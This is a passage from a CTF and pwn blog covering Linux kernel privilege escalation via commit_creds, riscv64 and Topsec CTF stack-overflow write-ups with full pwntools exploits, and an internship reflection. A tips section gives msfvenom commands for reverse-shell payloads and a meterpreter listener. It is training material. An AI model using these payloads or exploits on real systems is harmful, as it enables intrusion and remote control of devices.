<figure class="highlight asm"><table><tr><td class="code"><pre><code class="hljs asm">ENTRY(entry_SYSCALL_64)<br>    /* SWAPGS_UNSAFE_STACK is a macro; on x86 it is simply the swapgs instruction */<br>    SWAPGS_UNSAFE_STACK<br><br>    /* save the user stack pointer and switch to the kernel stack */<br>    movq %rsp, PER_CPU_VAR(rsp_scratch)<br>    movq PER_CPU_VAR(cpu_current_top_of_stack), %rsp<br><br>    /* save the registers with push, building a struct pt_regs */<br>    /* Construct struct pt_regs on stack */<br>    pushq $__USER_DS                /* pt_regs->ss */<br>    pushq PER_CPU_VAR(rsp_scratch)  /* pt_regs->sp */<br>    pushq %r11                      /* pt_regs->flags */<br>    pushq $__USER_CS                /* pt_regs->cs */<br>    pushq %rcx                      /* pt_regs->ip */<br>    pushq %rax                      /* pt_regs->orig_ax */<br>    pushq %rdi                      /* pt_regs->di */<br>    pushq %rsi                      /* pt_regs->si */<br>    pushq %rdx                      /* pt_regs->dx */<br>    pushq %rcx                      /* pt_regs->cx */<br>    pushq $-ENOSYS                  /* pt_regs->ax */<br>    pushq %r8                       /* pt_regs->r8 */<br>    pushq %r9                       /* pt_regs->r9 */<br>    pushq %r10                      /* pt_regs->r10 */<br>    pushq %r11                      /* pt_regs->r11 */<br>    sub $(6*8), %rsp                /* pt_regs->bp, bx, r12-15 not saved */<br></code></pre></td></tr></table></figure>
<ol start="4"><li>Assembly checks whether this is the x32 ABI.</li><li>The system call number indexes the global sys_call_table and execution continues in the matching handler.</li></ol>
<h2 id="kernel-space-to-user-space"><a href="#kernel-space-to-user-space" class="headerlink" title="kernel space to user space"></a><strong>kernel space to user space</strong></h2>
<p>On the way out:</p>
<ol><li>swapgs restores the GS value</li><li>sysretq or iretq returns to user space. iretq additionally needs the user-space context (CS, eflags/rflags, esp/rsp, etc.) supplied on the stack</li></ol>
<h1 id="struct-cred"><a href="#struct-cred" class="headerlink" title="struct cred"></a><strong>struct cred</strong></h1>
<p>As mentioned above, the kernel records each process's privileges; concretely, it does so in a cred structure. Every process has one, holding its uid, gid and related information, so changing a process's cred changes its privileges.<br>The <a href="https://code.woboq.org/linux/linux/include/linux/cred.h.html#cred">source</a>:</p>
<figure class="highlight cpp"><table><tr><td class="code"><pre><code class="hljs cpp">struct cred {<br>    atomic_t    usage;<br>#ifdef CONFIG_DEBUG_CREDENTIALS<br>    atomic_t    subscribers;    /* number of processes subscribed */<br>    void        *put_addr;<br>    unsigned    magic;<br>#define CRED_MAGIC  0x43736564<br>#define CRED_MAGIC_DEAD 0x44656144<br>#endif<br>    kuid_t      uid;        /* real UID of the task */<br>    kgid_t      gid;        /* real GID of the task */<br>    kuid_t      suid;       /* saved UID of the task */<br>    kgid_t      sgid;       /* saved GID of the task */<br>    kuid_t      euid;       /* effective UID of the task */<br>    kgid_t      egid;       /* effective GID of the task */<br>    kuid_t      fsuid;      /* UID for VFS ops */<br>    kgid_t      fsgid;      /* GID for VFS ops */<br>    unsigned    securebits; /* SUID-less security management */<br>    kernel_cap_t    cap_inheritable; /* caps our children can inherit */<br>    kernel_cap_t    cap_permitted;  /* caps we're permitted */<br>    kernel_cap_t    cap_effective;  /* caps we can actually use */<br>    kernel_cap_t    cap_bset;   /* capability bounding set */<br>    kernel_cap_t    cap_ambient;    /* Ambient capability set */<br>#ifdef CONFIG_KEYS<br>    unsigned char   jit_keyring;    /* default keyring to attach requested<br>                     * keys to */<br>    struct key __rcu *session_keyring; /* keyring inherited over fork */<br>    struct key  *process_keyring; /* keyring private to this process */<br>    struct key  *thread_keyring; /* keyring private to this thread */<br>    struct key  *request_key_auth; /* assumed request_key authority */<br>#endif<br>#ifdef CONFIG_SECURITY<br>    void        *security;  /* subjective LSM security */<br>#endif<br>    struct user_struct *user;   /* real user ID subscription */<br>    struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */<br>    struct group_info *group_info;  /* supplementary groups for euid/fsgid */<br>    struct rcu_head rcu;        /* RCU deletion hook */<br>} __randomize_layout;<br></code></pre></td></tr></table></figure>
<h1 id="内核态函数"><a href="#内核态函数" class="headerlink" title="内核态函数"></a><strong>Kernel-mode functions</strong></h1>
<p>Compared with the user-space library functions, the kernel-side equivalents differ a little:</p>
<ul><li>printf() -> <strong>printk()</strong>, though printk() does not necessarily show anything on the terminal; the output always lands in the kernel ring buffer, which you can read with dmesg</li><li>memcpy() -> <strong>copy_from_user()/copy_to_user()</strong><ul><li>copy_from_user() copies data from user space into kernel space</li><li>copy_to_user() copies data from kernel space out to user space</li></ul></li><li>malloc() -> <strong>kmalloc()</strong>, the kernel memory allocator; similar to malloc() but backed by the slab/slub allocator</li><li>free() -> <strong>kfree()</strong>, the counterpart of kmalloc()</li></ul>
<p>Also note that since the kernel manages processes, it also records their privileges. Two kernel functions make changing those privileges easy:</p>
<ul><li><strong>int commit_creds(struct cred *new)</strong></li><li><strong>struct cred *prepare_kernel_cred(struct task_struct *daemon)</strong></li></ul>
<p>As the names suggest, executing commit_creds(prepare_kernel_cred(0)) grants root privileges; the 0 means the new credentials are prepared with process 0 as the reference.<br>See the <a href="https://elixir.bootlin.com/linux/v4.6/source/kernel/cred.c#L594">source</a> for more on prepare_kernel_cred.<br>commit_creds(prepare_kernel_cred(0)) is also the most common privilege-escalation route, and the addresses of both functions can be looked up in /proc/kallsyms (/proc/ksyms on older kernels).</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">post sudo grep commit_creds /proc/kallsyms<br>[sudo] m4x 的密码:<br>ffffffffbb6af9e0 T commit_creds<br>ffffffffbc7cb3d0 r __ksymtab_commit_creds<br>ffffffffbc7f06fe r __kstrtab_commit_creds<br>post sudo grep prepare_kernel_cred /proc/kallsyms<br>ffffffffbb6afd90 T prepare_kernel_cred<br>ffffffffbc7d4f20 r __ksymtab_prepare_kernel_cred<br>ffffffffbc7f06b7 r __kstrtab_prepare_kernel_cred<br></code></pre></td></tr></table></figure>
<p>Normally the contents of /proc/kallsyms are only readable as root,<br>which is why, when editing the init script, you change the privileges to root so that you can read base addresses and the like while debugging.</p>
<h1 id="CTF-kernel-pwn-相关"><a href="#CTF-kernel-pwn-相关" class="headerlink" title="CTF kernel pwn 相关"></a><strong>CTF kernel pwn</strong></h1>
<p>You are usually given three files:</p>
<ol><li>boot.sh: a shell script that boots the kernel, usually with qemu; the mitigations in force depend on the qemu arguments</li><li>bzImage: the kernel binary</li><li>rootfs.cpio: the file system image</li></ol>
<p>For example:</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">youlin@youlin-virtual-machine:~/kernel/qwb2018-core/give_to_player$ ls<br>bzImage  core  core.cpio  core.ko  exp  exp.c  g1  g2  start.sh  vmlinux<br>youlin@youlin-virtual-machine:~/kernel/qwb2018-core/give_to_player$ file vmlinux<br>vmlinux: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=1d8344e71a82bc43821029796ef65bebfe8e65c3, not stripped<br>youlin@youlin-virtual-machine:~/kernel/qwb2018-core/give_to_player$ file bzImage<br>bzImage: Linux kernel x86 boot executable bzImage, version 4.15.8 (simple@vps-simple) #19 SMP Mon Mar 19 18:50:28 CST 2018, RO-rootFS, swap_dev 0X6, Normal VGA<br>youlin@youlin-virtual-machine:~/kernel/qwb2018-core/give_to_player$ cat start.sh<br>qemu-system-x86_64 \<br>-m 128M \<br>-kernel ./bzImage \<br>-initrd  ./core.cpio \<br>-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \<br>-s  \<br>-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \<br>-nographic  \<br><br></code></pre></td></tr></table></figure>
<ol><li>The qemu arguments explained:<ul><li>initrd rootfs.cpio: use rootfs.cpio as the file system the kernel boots from</li><li>kernel ./bzImage: use bzImage as the kernel image</li><li>cpu kvm64,+smep: CPU security options; here SMEP is enabled</li><li>m 64M: set the virtual RAM to 64M (the default is 128M); the remaining options are listed by --help</li></ul></li><li>Once the exploit is written locally, the compiled binary can be transferred to the remote box by base64 encoding or similar and run there to read the flag. Building against musl or uclibc keeps the exploit small, which makes the transfer easier. (Note that a kernel exploit is written in C, not in Python.)</li></ol>]]></content>
</entry>
<entry>
<title>技巧记录</title>
<link href="/2023/09/25/%E6%8A%80%E5%B7%A7%E8%AE%B0%E5%BD%95/"/>
<url>/2023/09/25/%E6%8A%80%E5%B7%A7%E8%AE%B0%E5%BD%95/</url>
<content type="html"><![CDATA[<h1 id="VMware每次重启共享文件夹失效"><a href="#VMware每次重启共享文件夹失效" class="headerlink" title="VMware每次重启共享文件夹失效"></a>VMware shared folder stops working after every reboot</h1>
<p>The root cause is that vmhgfs-fuse is not started when the Linux guest boots.</p>
<p>The simplest workaround is to disable and then re-enable the folder in the shared-folder settings, but that gets tedious.</p>
<p>Instead, add an entry to the file system table: edit /etc/fstab and append this line at the bottom.</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">vmhgfs-fuse /mnt/hgfs fuse defaults,allow_other 0 0<br></code></pre></td></tr></table></figure>
<h1 id="固件解包网站"><a href="#固件解包网站" class="headerlink" title="固件解包网站"></a>Firmware unpacking site</h1>
<p><a href="https://zhiwanyuzhou.com/multiple_analyse/firmware/">https://zhiwanyuzhou.com/multiple_analyse/firmware/</a></p>
<h1 id="pip-install安装包代理"><a href="#pip-install安装包代理" class="headerlink" title="pip install安装包代理"></a>pip install package mirror</h1>
<figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">pip install angr -i https://pypi.tuna.tsinghua.edu.cn/simple<br></code></pre></td></tr></table></figure>
<h1 id="异构内核文件系统下载"><a href="#异构内核文件系统下载" class="headerlink" title="异构内核文件系统下载"></a>Kernel and file system images for other architectures</h1>
<p><a href="https://people.debian.org/~aurel32/qemu/">https://people.debian.org/~aurel32/qemu/</a></p>
<h1 id="docker-stop显示权限不足"><a href="#docker-stop显示权限不足" class="headerlink" title="docker stop显示权限不足"></a>docker stop reports insufficient permissions</h1>
<p>Run the command below, then stop the container again:</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">sudo aa-remove-unknown<br></code></pre></td></tr></table></figure>
<h1 id="异构反弹shell的shellcode生成"><a href="#异构反弹shell的shellcode生成" class="headerlink" title="异构反弹shell的shellcode生成"></a>Generating reverse-shell shellcode for other architectures</h1>
<figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">msfvenom --format python --payload linux/mipsle/shell_reverse_tcp LHOST=192.168.182.131 LPORT=8888<br></code></pre></td></tr></table></figure>
<p>This prints the shellcode in Python form.</p>
<p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403181755391.png" alt="image-20240318175539273"></p>
<h1 id="iot反弹shell马生成"><a href="#iot反弹shell马生成" class="headerlink" title="iot反弹shell马生成"></a>Generating a reverse-shell payload for IoT</h1>
<figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">msfvenom -p linux/mipsle/meterpreter/reverse_tcp LHOST=192.168.182.137 LPORT=8888 -f elf > msf<br></code></pre></td></tr></table></figure>
<p>Serve it over HTTP with Python, then fetch the generated binary with wget.</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">python -m http.server<br></code></pre></td></tr></table></figure>
<p>Then start the listener in msfconsole first:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">msfconsole<br>use exploit/multi/handler<br>set payload linux/mipsle/meterpreter/reverse_tcp<br>set LHOST 192.168.0.12<br>set LPORT 8888<br>run<br></code></pre></td></tr></table></figure>
<p>Run the binary and the shell comes back; file transfer works through the session as well.</p>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/26443359/1698750389758-63b9cdb6-93df-4e61-9387-778fac9356af.png" alt="img"></p>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/26443359/1698750403732-012e85c5-c718-4e6d-ac2a-864300d960fc.png" alt="img"></p>]]></content>
</entry>
<entry>
<title>riscv64调试记录</title>
<link href="/2023/09/25/riscv64%E8%B0%83%E8%AF%95%E8%AE%B0%E5%BD%95/"/>
<url>/2023/09/25/riscv64%E8%B0%83%E8%AF%95%E8%AE%B0%E5%BD%95/</url>
<content type="html"><![CDATA[<h1 id="risky-login"><a href="#risky-login" class="headerlink" title="risky_login"></a><strong>risky_login</strong></h1>
<p>The challenge itself is not difficult. IDA cannot decompile riscv64 into pseudocode, so this one was reversed with ghidra.</p>
<p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252028514.png"></p>
<p>There is an obvious stack overflow in FUN_12345786, but a check has to be bypassed first:</p>
<figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">8 &lt; (byte)sVar1<br></code></pre></td></tr></table></figure>
<p>This is a clear type confusion. A quick search (via GPT) confirms that a byte only ranges over 0-0xff, while the size is far larger, so there is an obvious integer overflow: the condition is satisfied when the length of param_1 is at least 0x100 and less than 0x108.</p>
<p>There is also a backdoor function.</p>
<p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252042353.png"></p>
<p>So the overflow length is presumably 0x100, after which the filter inside the backdoor function has to be bypassed; using the shell's * completion does that.</p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><code class="hljs python">from pwn import *<br>from ctypes import *<br>from struct import pack<br>binary = "./pwn"<br>elf = ELF(binary)<br>libc = ELF("./libc.so.6")<br>#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")<br>ip = 'tcp.cloud.dasctf.com'<br>port = 28250<br>local = 1<br>if local:<br>    # io = process(["qemu-riscv64-static","-L","/usr/riscv64-linux-gnu/",binary])<br>    io = process(["qemu-riscv64-static","-L","/usr/riscv64-linux-gnu/","-g","1234",binary])<br>else:<br>    io = remote(ip, port)<br><br>context(log_level = 'debug', os = 'linux', arch = 'amd64')<br>#context(log_level = 'debug', os = 'linux', arch = 'i386')<br><br>def dbg():<br>    gdb.attach(io)<br>    pause()<br><br>s = lambda data : io.send(data)<br>sl = lambda data : io.sendline(data)<br>sa = lambda text, data : io.sendafter(text, data)<br>sla = lambda text, data : io.sendlineafter(text, data)<br>r = lambda : io.recv()<br>ru = lambda text : io.recvuntil(text)<br>uu32 = lambda : u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))<br>uu64 = lambda : u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))<br>iuu32 = lambda : int(io.recv(10),16)<br>iuu64 = lambda : int(io.recv(6),16)<br>uheap = lambda : u64(io.recv(6).ljust(8,b'\x00'))<br>lg = lambda data : io.success('%s -> 0x%x' % (data, eval(data)))<br>ia = lambda : io.interactive()<br><br>backdoor=0x123456ee<br><br>ru('Input ur name:')<br>payload=b'A'*8<br>s(payload)<br><br>ru("Input ur words")<br>payload=b'A'.ljust(0x100,b'A')+p64(backdoor)<br>s(payload)<br><br>sleep(0.5)<br>sl(b'cat fl*')<br><br>ia()<br></code></pre></td></tr></table></figure>
<h1 id="调试技巧"><a href="#调试技巧" class="headerlink" title="调试技巧"></a>Debugging tips</h1>
<p>This challenge did not actually need any debugging: once the program logic is roughly understood the exploit can be written directly. Still, to be ready for the next riscv64 challenge, it is worth learning how.</p>
<p>According to z1r0, pwndbg does not support debugging riscv64, and patching it means changing the source in quite a few places (too much for me, so I gave up on that route).</p>
<p>Conveniently, guozi's course on non-x86 architectures on bilibili covers this, so after re-watching it here is the riscv64 debugging procedure.</p>
<p>First, the command to run a riscv64 binary:</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">qemu-riscv64-static -L /usr/riscv64-linux-gnu/ ./pwn<br></code></pre></td></tr></table></figure>
<p>The debugging command:</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">qemu-riscv64-static -L /usr/riscv64-linux-gnu/ -g 1234 ./pwn<br></code></pre></td></tr></table></figure>
<p>Then connect to that port with gdb-multiarch:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">gdb-multiarch pwn<br>set architecture riscv:rv64<br>target remote 0.0.0.0:1234<br></code></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252038736.png" alt="image-20230925203838667"></p>
<p>pwndbg errors out and none of its usual context is shown, so only gdb's built-in commands are available for inspecting the stack and the address the program is executing at.</p>
<p>Set a breakpoint as usual, just after the strcpy (the address is hexadecimal, so it needs the 0x prefix):</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">b *0x123457e0<br></code></pre></td></tr></table></figure>
<p>Continue with c; again nothing is displayed.</p>
<p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252025664.png" alt="Untitled"></p>
<p>x/20i $pc shows where execution currently is.</p>
<p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252039624.png" alt="image-20230925203910578"></p>
<p>i r shows the state of all registers.</p>
<p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252041387.png"></p>
<p>x/40gx $sp shows the stack at this point.</p>
<p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252025823.png" alt="Untitled"></p>
<p>Reading the assembly, and confirming it in the debugger, shows that the value at sp+280 is loaded into ra and used as the return address, and that the input lands at $sp+0x18, which gives an overflow length of 0x100.</p>
<p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252025955.png" alt="Untitled"></p>]]></content>
</entry>
<entry>
<title>Internship Summary</title>
<link href="/2023/09/25/%E5%AE%9E%E4%B9%A0%E6%80%BB%E7%BB%93/"/>
<url>/2023/09/25/%E5%AE%9E%E4%B9%A0%E6%80%BB%E7%BB%93/</url>
<content type="html"><![CDATA[<h1 id="感想"><a href="#感想" class="headerlink" title="感想"></a>Reflections</h1><p>I have to say time flies; before I knew it I am already a third-year student. It feels like not long ago that I was reading toka's internship summary, and now my own second-year internship is already over.</p><p>I was fairly lucky to get the chance to intern in Guangzhou. My plan for the summer after second year had been to study IoT and penetration testing properly; I had no thought of interning and never sent my résumé anywhere (hhh, I had not even started writing one). The turning point was probably around May, when someone asked in a group whether any pwn players had time to write challenges. Many people were presumably busy with finals and competitions, so I took the job (nothing motivates learning quite like money) and within a day or two had learned how to package pwn challenges with Docker. Around June they asked whether I had time to come to Guangzhou for an internship, saying there would not be much work and the hours were flexible; after some back and forth I went. (The hours really were flexible: for most of the two months I spent the working day on my own things.) I was also happy with my colleagues and the company atmosphere (above all, housing being provided saves a lot of trouble). Life in Guangzhou also seems a little more relaxed than in Beijing, Shanghai or Shenzhen; even 3k a month is comfortable when housing is covered, though without it you would need to be a bit more careful with money.</p><p>For me it genuinely broadened my horizons. Before this internship I had barely left Jiangxi, spending most of my time in a small county town, and even my university is in some out-of-the-way corner of Jiangxi. This was the first time I had lived in a first-tier city for so long and experienced a completely different way of life (Guangzhou has no chili: my colleague from Hunan and I agreed the chili here is pitifully scarce and most dishes have no heat at all). I was also lucky enough to watch two Guangzhou FC matches in person (the home atmosphere is really good: even after relegation to China League One you see thousands of people cheering the players on for the whole 90 minutes. Sadly I saw neither a win nor a single goal in those two games; I imagine the fans go properly wild after a goal or a victory, hhh. I am hooked on Guangzhou FC now and hope to see them play in the Super League again some day.)</p><p>The company atmosphere was very good. A small company is comparatively freer than a large one and there is little overtime (I never did any, and rarely saw other colleagues need to). From what I saw of other people's internships (toka's in particular) they seemed to need overtime almost every day. This company also had frequent perks: colleagues would occasionally treat everyone to bubble tea and snacks, people got along well, and the colleague I lived with was great, often treating me and the other intern to bubble tea or a meal and sharing his views on the industry with us.</p><h1 id="工作内容"><a href="#工作内容" class="headerlink" title="工作内容"></a>Work</h1><p>Although the position was nominally a security role, the only tasks the company actually gave me were CTF training, writing challenges for competitions, and playing CTFs. The rest of the time I studied on my own at the office (which for me meant more study time than at home, where there is always something going on). Fortunately, over the two months, with help from z1r0 and izeroo I picked up the basics of hunting for router vulnerabilities, and on pursue's advice I worked through a few VulnHub machines (which I hope to keep up).</p><h1 id="总结与唠叨?"><a href="#总结与唠叨?" class="headerlink" title="总结与唠叨?"></a>Summary and rambling?</h1><p>For someone from a small county town, this internship taught me a lot and gave me many new perspectives on the security industry. There were plenty of firsts too: my first flight, first time in Beijing, first time in Nanjing (hhh, only a layover). I got a feel for big-city life (rush-hour subways really are packed, and I was not even on the busiest Line 3) and a small shock in Beijing, where everyone entering the city by expressway has their ID card checked (ID checks are everywhere in Beijing; going anywhere without your ID feels inconvenient). The main takeaways were the training experience (which I hope to keep earning from), the router vulnerability-hunting experience (deep bows to zer0 and izeroo), and a rough understanding of penetration testing (a direction that is essentially different from CTF).</p>]]></content>
</entry>
<entry>
<title>天融信 (Topsec) Internet of Vehicles CTF Writeups</title>
<link href="/2023/09/25/%E5%A4%A9%E8%9E%8D%E4%BF%A1%E8%BD%A6%E8%81%94%E7%BD%91CTF%E6%80%BB%E7%BB%93/"/>
<url>/2023/09/25/%E5%A4%A9%E8%9E%8D%E4%BF%A1%E8%BD%A6%E8%81%94%E7%BD%91CTF%E6%80%BB%E7%BB%93/</url>
<content type="html"><![CDATA[<h1 id="easy-guess"><a href="#easy-guess" class="headerlink" title="easy_guess"></a>easy_guess</h1><p>Nothing much to this one: the exp calls rand() from the local libc through ctypes without seeding it, so the target must be using the default seed (equivalent to srand(1)), and the three predicted values get past the guessing stage. The 32-bit stack overflow that follows returns into system with the "/bin/sh" string present in the binary.</p><p>exp:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span 
class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> ctypes <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> struct <span class="hljs-keyword">import</span> pack<br>banary = <span class="hljs-string">"./easyguess"</span><br>elf = ELF(banary)<br><span class="hljs-comment">#libc = ELF("./libc.so.6")</span><br>libc=cdll.LoadLibrary(<span class="hljs-string">"/lib/x86_64-linux-gnu/libc.so.6"</span>)<br>ip = <span class="hljs-string">'123.127.164.29'</span><br>port = <span class="hljs-number">26921</span><br>local = <span class="hljs-number">1</span><br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(ip, port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dbg</span>():<br> gdb.attach(io)<br> pause()<br><br>s = <span class="hljs-keyword">lambda</span> data : io.send(data)<br>sl = <span class="hljs-keyword">lambda</span> data : io.sendline(data)<br>sa = <span class="hljs-keyword">lambda</span> text, data : io.sendafter(text, data)<br>sla = <span class="hljs-keyword">lambda</span> text, data : io.sendlineafter(text, data)<br>r = <span class="hljs-keyword">lambda</span> : io.recv()<br>ru = <span class="hljs-keyword">lambda</span> text : io.recvuntil(text)<br>uu32 = <span class="hljs-keyword">lambda</span> : u32(io.recvuntil(<span class="hljs-string">b"\xff"</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b'\x00'</span>))<br>uu64 = <span class="hljs-keyword">lambda</span> : u64(io.recvuntil(<span class="hljs-string">b"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span 
class="hljs-number">8</span>, <span class="hljs-string">b"\x00"</span>))<br>iuu32 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br>iuu64 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br>uheap = <span class="hljs-keyword">lambda</span> : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b'\x00'</span>))<br>lg = <span class="hljs-keyword">lambda</span> addr : log.info(addr)<br>ia = <span class="hljs-keyword">lambda</span> : io.interactive()<br><br>ru(<span class="hljs-string">"You have three times"</span>)<br>num=libc.rand()<br>sl(<span class="hljs-built_in">str</span>(num))<br>sleep(<span class="hljs-number">0.5</span>)<br>num1=libc.rand()<br>sl(<span class="hljs-built_in">str</span>(num1))<br>sleep(<span class="hljs-number">0.5</span>)<br>num2=libc.rand()<br>sl(<span class="hljs-built_in">str</span>(num2))<br><br>system=elf.plt[<span class="hljs-string">'system'</span>]<br>bin_sh=<span class="hljs-number">0x08049A30</span><br>ru(<span class="hljs-string">"right! 
You get a chance to pwn it!"</span>)<br>payload=<span class="hljs-string">b'A'</span>*<span class="hljs-number">0x1c</span>+<span class="hljs-string">b'A'</span>*<span class="hljs-number">4</span>+p32(system)+p32(<span class="hljs-number">0</span>)+p32(bin_sh)<br>sl(payload)<br>ia()<br></code></pre></td></tr></table></figure><h1 id="guess"><a href="#guess" class="headerlink" title="guess"></a>guess</h1><p>A stack challenge with every protection enabled. The vulnerable code runs in a thread created with pthread_create, and a thread's stack is mapped directly below its TLS block, so a long enough overflow reaches both the canary copy on the stack and the reference value stored in TLS; writing the same value to both defeats the check. start_routine has an obvious gets overflow, and in the number-guessing function entering '-' skips the input while the program still echoes the variable, leaking a program address from which the base is computed.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251952494.png" alt="Untitled"></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs python">ru(<span class="hljs-string">"Enter the size :"</span>)<br>sl(<span class="hljs-built_in">str</span>(<span class="hljs-number">100</span>))<br>ru(<span class="hljs-string">"Enter the number of tries :"</span>)<br>sl(<span class="hljs-built_in">str</span>(<span class="hljs-number">1</span>))<br>ru(<span class="hljs-string">"Enter your guess :"</span>)<br><span class="hljs-comment">#num=libc.rand()</span><br><span class="hljs-comment">#sl(str(num))</span><br><br>sl(<span class="hljs-string">b'-'</span>)<br><span class="hljs-comment">#pause()</span><br>ru(<span class="hljs-string">b'You entered '</span>)<br>base = <span class="hljs-built_in">int</span>(ru(<span 
class="hljs-string">b' '</span>)[:-<span class="hljs-number">1</span>]) - <span class="hljs-number">0x1579</span><br>lg(<span class="hljs-string">"base:"</span>+<span class="hljs-built_in">hex</span>(base))<br>pop_rdi=base+<span class="hljs-number">0x0000000000001793</span><br>ret=base+<span class="hljs-number">0x000000000000101a</span><br>puts_plt=elf.plt[<span class="hljs-string">'puts'</span>]+base<br>puts_got=elf.got[<span class="hljs-string">'puts'</span>]+base<br>back=base+<span class="hljs-number">0x000000000001436</span><br></code></pre></td></tr></table></figure><h2 id="偏移计算"><a href="#偏移计算" class="headerlink" title="偏移计算"></a>Offset calculation</h2><p>Note that the breakpoint has to be set beforehand. The memory map shows the input buffer sitting in the mapping next to libc (it is the mmapped thread stack, not libc itself); pwndbg's tls and canary commands then give the location of the canary in TLS.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251950871.png" alt="Untitled"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251952928.png" alt="image-20230925195234111"></p><p>This puts the TLS canary 0x858 bytes past the start of the input. The payload below overwrites it, leaks the libc base through puts and returns into start_routine for a second round; the final call has a stack-alignment problem (system needs a 16-byte aligned stack), which inserting a run of ret gadgets fixes.</p><p>Full exp:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span 